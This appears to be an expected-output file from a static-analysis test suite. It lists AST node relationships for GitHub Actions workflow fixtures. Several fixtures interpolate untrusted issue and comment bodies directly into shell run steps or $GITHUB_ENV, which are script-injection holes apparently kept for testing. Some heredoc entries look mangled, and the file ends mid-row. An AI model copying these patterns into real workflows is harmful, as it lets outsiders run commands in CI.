.github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | 